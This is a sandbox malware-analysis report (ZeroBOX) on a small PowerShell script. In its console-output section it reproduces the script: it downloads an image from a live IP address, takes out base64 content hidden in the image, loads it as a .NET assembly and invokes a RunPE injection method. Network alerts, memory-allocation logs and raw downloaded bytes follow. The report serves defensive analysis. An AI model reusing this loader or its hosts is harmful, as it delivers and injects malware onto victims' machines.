Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	July 4, 2024, 9:51 a.m.	July 4, 2024, 9:53 a.m.

Size	1.4KB
Type	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
MD5	`fdd6b3b4eafee0cdace6be04340d721d`
SHA256	`be0d4d2614cfa382d4c2c09ec6f5246b0578960650904a24c2783547c8f33a66`
CRC32	`CEAECD38`
ssdeep	`24:+RfOeuDmJMqNL3B1soSWCdhWZzwiK52Su2xc2hpfsHVjsfXV1sc:ufOE3xB1G/ZiuxrqqU1WV1sc`
Yara	None matched

powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy unrestricted -File C:\Users\test22\AppData\Local\Temp\file_01ntx0mv.bfk.txt.ps1
2544

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
91.92.254.194	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 91.92.254.194:80 -> 192.168.56.101:49162	2400012	ET DROP Spamhaus DROP Listed Traffic Inbound group 13	Misc Attack
TCP 91.92.254.194:80 -> 192.168.56.101:49162	2047750	ET MALWARE Base64 Encoded MZ In Image	A Network Trojan was detected
TCP 91.92.254.194:80 -> 192.168.56.101:49162	2049038	ET MALWARE Malicious Base64 Encoded Payload In Image	A Network Trojan was detected

Suricata TLS

No Suricata TLS

Queries for the computername (1 event)

Time & API	Arguments	Status	Return	Repeated
GetComputerNameW July 4, 2024, 9:51 a.m.	computer_name: TEST22-PC	1	1	0

Command line console output was observed (19 events)

Time & API	Arguments	Status	Return
WriteConsoleW July 4, 2024, 9:51 a.m.	buffer: Exception calling "Invoke" with "2" argument(s): "The requested security protoc console_handle: 0x00000023	1	1
WriteConsoleW July 4, 2024, 9:51 a.m.	buffer: ol is not supported." console_handle: 0x0000002f	1	1
WriteConsoleW July 4, 2024, 9:51 a.m.	buffer: At line:1 char:917 console_handle: 0x0000003b	1	1
WriteConsoleW July 4, 2024, 9:51 a.m.	buffer: + $link = 'http://91.92.254.194/imge/new-image_v.jpg'; $webClient = New-Object console_handle: 0x00000047	1	1
WriteConsoleW July 4, 2024, 9:51 a.m.	buffer: System.Net.WebClient; try { $downloadedData = $webClient.DownloadData($link) } console_handle: 0x00000053	1	1
WriteConsoleW July 4, 2024, 9:51 a.m.	buffer: catch { Write-Host 'Failed To download data from $link' -ForegroundColor Red; e console_handle: 0x0000005f	1	1
WriteConsoleW July 4, 2024, 9:51 a.m.	buffer: xit }; if ($downloadedData -ne $null) { $imageText = [System.Text.Encoding]::UT console_handle: 0x0000006b	1	1
WriteConsoleW July 4, 2024, 9:51 a.m.	buffer: F8.GetString($downloadedData); $startFlag = '<<BASE64_START>>'; $endFlag = '<<B console_handle: 0x00000077	1	1
WriteConsoleW July 4, 2024, 9:51 a.m.	buffer: ASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageT console_handle: 0x00000083	1	1
WriteConsoleW July 4, 2024, 9:51 a.m.	buffer: ext.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { console_handle: 0x0000008f	1	1
WriteConsoleW July 4, 2024, 9:51 a.m.	buffer: $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $bas console_handle: 0x0000009b	1	1
WriteConsoleW July 4, 2024, 9:51 a.m.	buffer: e64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = console_handle: 0x000000a7	1	1
WriteConsoleW July 4, 2024, 9:51 a.m.	buffer: [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.R console_handle: 0x000000b3	1	1
WriteConsoleW July 4, 2024, 9:51 a.m.	buffer: eflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunP console_handle: 0x000000bf	1	1
WriteConsoleW July 4, 2024, 9:51 a.m.	buffer: E.Home'); $method = $type.GetMethod('VAI').Invoke <<<< ($null, [object[]] ('txt console_handle: 0x000000cb	1	1
WriteConsoleW July 4, 2024, 9:51 a.m.	buffer: .4446sabbbbbbbewmadam/441.871.64.891//:ptth' , 'desativado' , 'desativado' , 'd console_handle: 0x000000d7	1	1
WriteConsoleW July 4, 2024, 9:51 a.m.	buffer: esativado','AddInProcess32','')) } } console_handle: 0x000000e3	1	1
WriteConsoleW July 4, 2024, 9:51 a.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x000000ef	1	1
WriteConsoleW July 4, 2024, 9:51 a.m.	buffer: + FullyQualifiedErrorId : DotNetMethodTargetInvocation console_handle: 0x000000fb	1	1

Uses Windows APIs to generate a cryptographic key (6 events)

Time & API	Arguments	Status	Return
CryptExportKey July 4, 2024, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x05501528 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x05501528 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x05501528 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x05501528 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x05501528 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey July 4, 2024, 9:51 a.m.	buffer: <INVALID POINTER> crypto_handle: 0x05501528 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx July 4, 2024, 9:51 a.m.		1	1	0

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

GET method with no useragent header, Connection to IP address

suspicious_request

GET http://91.92.254.194/imge/new-image_v.jpg

Performs some HTTP requests (1 event)

request

GET http://91.92.254.194/imge/new-image_v.jpg

Allocates read-write-execute memory (usually to unpack itself) (35 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory July 4, 2024, 9:51 a.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0271b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 9:51 a.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0272f000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 9:51 a.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026b9000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 9:51 a.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05710000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 9:51 a.m.	process_identifier: 2544 region_size: 327680 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 9:51 a.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 9:51 a.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef40000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 9:51 a.m.	process_identifier: 2544 region_size: 65536 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef30000 allocation_type: 1056768 (MEM_RESERVE\|MEM_TOP_DOWN) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 9:51 a.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x7ef30000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 9:51 a.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05711000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 9:51 a.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x060b0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 9:51 a.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02729000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 9:51 a.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a42000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 9:51 a.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05712000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 9:51 a.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05476000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 9:51 a.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05477000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 9:51 a.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05713000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 9:51 a.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05714000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 9:51 a.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027d0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 9:51 a.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05715000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 9:51 a.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x027d1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 9:51 a.m.	process_identifier: 2544 region_size: 1441792 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x07750000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 9:51 a.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x07870000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 9:51 a.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x07871000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 9:51 a.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x07872000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 9:51 a.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x07873000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 9:51 a.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x07874000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 9:51 a.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05716000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 9:51 a.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05717000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 9:51 a.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05718000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 9:51 a.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x026bd000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 9:51 a.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05478000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 9:51 a.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05461000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 9:51 a.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x05719000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory July 4, 2024, 9:51 a.m.	process_identifier: 2544 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x060b1000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1

Checks adapter addresses which can be used to detect virtual network interfaces (1 event)

Time & API	Arguments	Status	Return	Repeated
GetAdaptersAddresses July 4, 2024, 9:51 a.m.	flags: 15 family: 0		111	0

URL downloaded by powershell script (3 events)

Data received	D^àÍ× »¥Ùµ'Ò8ÇÆ·û^UÕ]H,^`&û!äSgõ«kÝ&iN T ªíSÅÀâÚåÙ3¸ßBÜÎ}<Èhîã\ Wðí³BHOÞ½ux/2u?f]!=+ÊÎBî^6:ßRHÍ°;+ç?ëéuzí8/¡Wª2ß&ÏJ<ýp2¼ nÄÃ°)÷£wUÏ¯é\|ZIôJ%hö²¼Ð6 gË¥y{,Çi%{{V{³<ÌcÒêc@Qgó¯åêàÕT+åºº°aaèAøæ«jÕ5:e[Ä2·á<uç¾Ù¨²Ã§H¤UÚYNÂ6óÁ¿1¤UµnZÈàû\|O~GljmãmÔ`åÕQ\|mès<ê1QÅpOªQ¤TU¢NãÀ®üfmKøf§a&µ#ñpsó¾®5û¬òï£Ùõïû] & £wde&þþ¿®\|W,oáò!p®¬ {àbl n1Ý3»D9³\|y¸à1e¦-^râ2ÊmE¬¨5;è©Ô$ADYN<µXöZ<WL¾âþc8àô:Ö\¾ÄÎùàB&àVl#ª-T Ä)µ%vQè=¯¾2\m, ðr:}qµrR~3ÐÖÚ<÷ÆDkÒFV7U}$cºö¿¶:tÓ<Q<`3I·Óé/¡Úw6949ù]ðé&5fShÌ~EIü?]jiãÓÞÕ·3qék;x±føºäñÒ:1UônfÚY÷"¨P:òóÓÎ"ûÉØhÛWp<¹[qm¯´µí?Í?®ÖÅ<k{v¨V{¬ <Wÿ\|è?\]&0È±±Xî2;(b^)¯Ó$ªãÂ]TZæ1ªcÇ#¦Oâ $²¤VøÚM!;Oá¬2Í§×/RÚ8£l}ðÖËÂH>-²Ç©î2uz)4úÔ´wÃW\`tïdc ËyrÚ ÑàU':¢Á$_éðýè¥¤nü9 ¤5X+ÀKY¢ÒóY\4 Æf¤ú^&þl0ÍçØÑ8<ýÐK½HSÐQÁ7YüÍ3ü&ÁS\p)3ÊÃ vçÚ'r¡Ê:äù/±ÑÕ×>ø2ùÊÈHP£¯scbÂ¹±.F¯¨Á$e%°z®IM±J .¯ÕD Ù7á¾¸}##H m¶l6¥Òfm"ºà¼7LñyF»¯ü0jxÖ· Ù+¸úcb$gT2ícÒï^8ÕTu¿jÀè`ó¢©g7Ï£Åü±B)(£pjq5± µW =²Vz-~¢EÀÐETDíÛ¾fO¨BÎ5nººçVÞö ñW\|RmÌ\LÔIíTUT±VïlD#vÖ¯â aâT@©v@«÷Îbâè©^}¨E.Þ/¹ÍbñíUµ4lSHªC(#hç'FÑIÆûo\|$vdì¤^bÓÀåå$éÅbmb»Ìxq6äa¾¯B&vQD ¸Å 2~#5¤³'âKãÔí$ÜO@p3ë:±¨ôþl[¢;à¤Q»é<ËH"ÊÖVue¨ß?<¼jOE'é>¢Ir.át(H'l¥`YÈ,JÆV³«'È»Ü-Õá¤À ÙúaôË½É, íY£0Ë°úã:Wvuÿ¶mC»m`¬Êhs««ìk ÛRÉÚC®»ãè06f@ÆÑ?\ÏEáð¨ o?ÒS®Ô/åËDÖ 04Õáã$ bÁXÐ=f4Ë@]0ê$.P°0q6¢BÔ@ s°`A$qf«ÃÌIf&¨ñðÎwR5°À<Z©<ÒÏÅÜò1¨¹iTÐøpU-êøwÇbZ(á[dÆÓÄ]#e6yïó«iÔ%@º§#ê»è£`^ÓÊv©<^ø5)*òAàbí©DpÀ
Data received	ËÊILVÁª#p#}ðÄ R»@éÏó.}SÍ"TµFÕI Bú$üòW,«W·4DçkË[6Ö t'ÓiÝ"ÌZS"iÆâÄÄ_åÄÚyFÒR´Õº®ÇVY´sÃ¦)RI<Ñ¡Ë¥Ô g>ºàÒûc,v3 Þ¤roÒ:Éæ«:ªÚºÃtc2"mPÄØ¢Ä³1´óB¶Ú¦5£Fä¦«¸÷®0ñ=ÝÙ´ÌêÌÅdYEÊÊqõ0y±M$I´Q¦ëÈ4\|BYõÚÍDXu ÁTP tÅ}qX¼çFÙM Ä±Üöº0V`©c¥Ìª/ü§ôË @YÔl2"uÔ+;¶æ=HéPÞYRÑ±ç;a"VÚÜ]Öl_NÊ9`ßLm<°jn/0 è 2û%bR®Æ,®,õç¦RT-èÅPúTù·ÓÓ×Ím;NáðÅàÕ<ô©Üâ<hi];là,Iôr@Ä««°\|ö$Ûø'Üd7ÁºÆbVmê[¯LG2±"Ørp¡9Önï\|É<VE`eÄö=²Æ[Ð£\|`BbaÞê}¾8Ø<¢÷ÎX1ò I¬¨z©î8ÂÙÉ^àp±/~á¢ëïWöÂ°ç¯çd¨è£"lëYb»xÊÖVugVu`ue¶,ôÎ I¬²ÄîiA8µÎ;#®ôìG9xá¦¹[j)ôùd±bvIÂ¾®IÎÚ$Ð«ýVGó[tØeDNZ~lxhÃÊÈVÏ4r¢ÛêjÆapbc`ÒÇ×"ÈeDTE_OK®këx®ëôÂ;m×8Áï«ía¹#Þ(î±òÏOö?S$,\|Ç²YæP+)Ù#Fz²íñ6ØØ¾±wq3Øu£ÅXÅddb¦@6ò§ü1A_.e,h' His»ðKé¦¯Fò4D8,³« £úõåu.òøÍ)nCÅ®¯òÏI«ó>Ëê××<V Lúé3o"©?Lo#\²QÞTWíß¦ D²¾¢Qæ_¤=ò?,7è$_jceRÖà«÷À}ÝS<m8U[bw( ßu'éQF«÷m´O¬OÂ°L«#pBØ?û` å!«ÔoÖÔÏ ¦9õQ¤²y(ÖYëæ«ù`_ï #4a÷(`_ü»eFÖj,I"¶¢ñùuÍÑi~ø±#ª¥µo~GC¦Ò¤¾ Ñ¯£p å·áZüDô¯óÊ3mxA"C`+!<§Mb6<\|þéÐÉ>¡âyæpÓJyïgß¾[Á4ë÷·I!¢Õ!PÂÃv'ôÀÀcdò97¬gU´ê¦ÚÝíT(Z°:²r+:°&ÉNEdyÕ,sÐ¤rz`q&ùÊÖØ1$qÀÈBÀ¨õ¬µéÉ÷ÊõÈ¬n2£®HàØÎÀìâIÈ¬o²+:³««'Î¬ ¿\|¹`hP`ë:°/}lq¬êÀµß\ÒH>Ã)Yb{_p#hÝrµX¾¡@ìqð®½qsYÕÕÝj²öÀöZÙPCU²¨£\|UæT¡-Ô(b¦¾<ñÃë;ØòB\|\|ÈÖé¤ÆÜì+õiA¿ÃíxGÂÞbÂåiYXJ°þuê®½³dä³JÐºP.þÞ[hpYZÊúoÚþµ§®ñmòºnIÔÑ(]»ÉaëSÉä{ÑÆ\| ôú}nãK$~Ð4EXc°ÄüëC·]´ìÁJ50=yïØã~º?fR©#a¶d>ÖI¦%bóÛaOH ItàØ=N¦&O K©KJUT `=¿<b(>ñdQ¦à)tàIëÔà5ÚÄ8[r&ÂÕqwÆtÍÏKRJ²ÔPOÔÖ1"G+´!zX÷ ÅÓA÷9RYQh@cWÏ_;©ÍNP¯,XæÀsC>ÈÔÅâlQfÖAd©äÄ1@àVÀ_O.U$»\|ÈÞ6E&÷"SÔ¯ðNX¼´Ú\²ìÛ@÷»éè`Ô $`@ä©¨ð}bOØ&WPÒ2ö!«o@x±Ûùq¾Ã$±ïô÷å¶zýs>'BÇi]«ccCÕÿé9 ÔÎ#r¸mª¤Ù¾£ËN tËö^aJulHõ1=~p«6hLÔ6ÑÁëÛìþ¯IádJ%YÝM^vð}2þàO>ux!TÎ°ãÉNõ¾2ZI ÈÔ4{BÊ¤»;Få6;ç#À5t¿ooÓ=ý/¯xçóYX¬lÛJæÄfN \|?ïqjeû»ùlZ$3A»_~x8ÄS¸Ô¤¶°<µöÊº§¤«ÀÝxMV]<i#£ªHNÂË[®\xDd!UQ(ÕüD1äþxM'j ²O$ ýÑv@ö1mõ63XØ(º4,÷=Ä6»Ã_Bµ$3zIU&ÆàHíDpz`F¦xcÕHtî³Fê ,»EûWÃ)«Ô D¥ãD¬Y¶/áOô}1rèadîp5¤ðèB=KzTò ²£\z¯ðßFUc"·n¼U×ÓÖé~é¨òË6#;îPß\|^Þi5êÜ ü°=_@ÀÊðêTÌÃa;w4±M.Õ4{u>y,b2;K 3zH#ðí´mSÍ/4O^rtQùó§WE;¢²î%á=®#ã¡º-^ØE2#¡xâ¹ßúí<ó<g,ñÑRt]31¼B}I°X\3ü&úç®Òi4þ"ªS Ñ·í6@P,Õr9ö<üo)þÍðßi\|0HÍ¨-ËhU-d«ÛÿLé¤X´²Ë:´.È¡Xí ¤µ½ÏkÆ¢ñdXPK<H»4+ <ùÃÝ1h`ÑÌúH£(fUéL9ç¡¼EN]#UÞ¹À.îøã^%Ñk"Ó®ÂÑ+y¬¾îÔzlfGÁ§Dú½ÅC Ýê »¹ã¾jhtºoL·(eôðBÉº#¦Lq#hYaZe1 w¿ó¼ j4Rt©çD4Ê]ìúG¤tþd]Z4Uí»w:]\|0i§Õ,ºR5yC¢î=oZç\|¦ Ã½¶âÉ¶Ã ZûXÃ±1;QWk5ÅÉü¯4zXÁF¥Y(a\|É¬¶I_K¦V]Ä(MËV¾¦Q¹@è6à§ÕvDM¾o¬0AÚOçú`Xâf5ÀôãüÙIcB¥â ¯Åú+ó¼;«E1POK°h 2»;³²´q<ÝÈ+Ïá¿âÀÄ¯,¨¡ÁÖ`¦6XÎÒÄ5dqÁ\¬»CÃnEPQf¬{e©¼¹+V ßµ@±,+æ¸b JÖæ£ÏçjÑ]Ð2àîèÃ±¾U%«ãß%Â2²ï] °ëuÅíüà)"¦X¢Ó»µ°gV\|úâÆxýâi`¨n«}ìæ¨ÔVUYUI9\|â²ù¥CÊ¤µò¯aA÷'Úh·¨C»«Ñí#O¨icDª ÊXx<Ñäð~±Ì}zYJB*Ç{oÎQâT4Oæ¦X4E+ày@WÚÀ&ìcl9XÃ"ÜçG²C RÑ)à©ÜI¡Ô_ñêÜSìôÀ¨D- aj ÍVÂ¯äîkän«Á{a¶½Ï\|ÔvGçË}K-q]tzZVzbø½þ?½®Ý¤P"¯çìO,¶bxË$F ¦êWÛ I= »J-_ø¼]UºÕaP¢éjê0/1ÈÄÊæ4=n¸Â ;;9qU îØ,¦R H(PQ³ÖïÛÞ@qÑzp%ÝÖÅs!ÐQÛÙ°Ú±HcYÓó8K;ÔrÄÍ~¸i<7LÊeó<ÖRGµGáÎ1ÓmýÎ-DWV')£H_0í,Ä`Ö] ó!Ô)³IDµ[p#é>hÒ ¥°µ¶ÇÃ
Data received	Wú9X<@c÷xW¥mÚÕ~ücrÐÈ¸X¯Â°h¢(E6ÐG$PÉ2¯6ôÝ°Q#lf4-§VdEg²;´ZvV-½vf ÕÉ¾O×4FãõUXNí½ýð BÒªáf°X,YöÆõÐiÚd¸ÑP× ³Ó¦ÑêU÷$Ù!T:°6,×nÃ ©S¸[nôO£#ÄjRmT^ háE9î1ã»É u®2 n î¹ù`ó£MÜ^S§]§ä±éôÍwR¤¹®ÚÎE)ã¦ÄÑµ]]tå}AÀ#kÜ¥¶§,HÆÚ\ j%RÃÌrÄ{/L¢À¼0øë¥ÕCvIfgP#Vþ7D¨ p}ð&i¬×O®0ÉÍ]ãÜÕW×á9aòÕXµÛË±³X¸»®yãï u¦ÂGæ1ò Y7bI¿òÌ¨c+hª#b"áAÙ¶ý«ï¤»}¥V÷ëÆQ4(#C-,é² ÐâðÑ$¨«Ä³¬²Æ«±T0P¤Õß?×Ri ÿ³ÄkC6Û¾§§éÃ×M ÎÝ· ÙW\|{ürÅÐ@pøhI1ªGÅºt]]JÑ@òV°UW©®§,~XÃ$]êFâ($ûà§ÓÕ.¢ÔsG,8m°8ø@;Xj8jÚ6tý~xü6"L¶Ê¬ÍéëcøÞEä¹@^]¼8fÜì¸J×`4þ±mÙÔÜfÒ¹ ä D7yÆB.Õéß8çÜ/$ Uf(®AbðN¬òîWlv¡ØãXÈÂÐEnýq$Õ Tx®0ú` UòÀÙÑ¼ZY«PSÐã7]4Ö"ARTX>þYçÆÇðbIÜOo'6ü(H«Ûe¬×_ý°7¢ðí j`ëùæ¤:-¼¯"Å1P§w¤×ØöÍ1)Zû~+Ài´ÂI¼Âûwé®®Ëi@IfêM\|=ñ4ÞÎ¾²axä+QªÂÃóÀz8B!c´÷oú->¡6H#en#ûàHb 